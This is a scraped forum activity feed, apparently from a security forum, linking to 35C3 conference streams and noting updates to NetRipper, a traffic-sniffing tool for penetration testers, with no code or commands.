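Because the matching works on source-level features rather than compiled bytes, it sidesteps the compiler-optimization and "code doesn't compile anymore" problems described above.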
-
Put the sarmale down and do something useful: https://streaming.media.ccc.de/35c3/relive
-
-
-
-
-
Streaming: http://streaming.media.ccc.de/35c3 Schedule: https://fahrplan.events.ccc.de/congress/2018/Fahrplan/ As every year, there are many interesting talks. PS: Not all of them are "security" talks, but the ones that are, are worth watching.
-
-
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
Yes, it's in CrackMapExec, but it hasn't been updated in a long time. I met byt3bl33d3r at BlackHat Asia, he's a really nice guy; he said he would update it, but he probably forgot. Maybe I'll remind him about it. It's also in PTF, but likewise not updated: https://github.com/trustedsec/ptf/tree/master/modules/windows-tools -
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper - Added support for Opera and SecureCRT https://github.com/NytroRST/NetRipper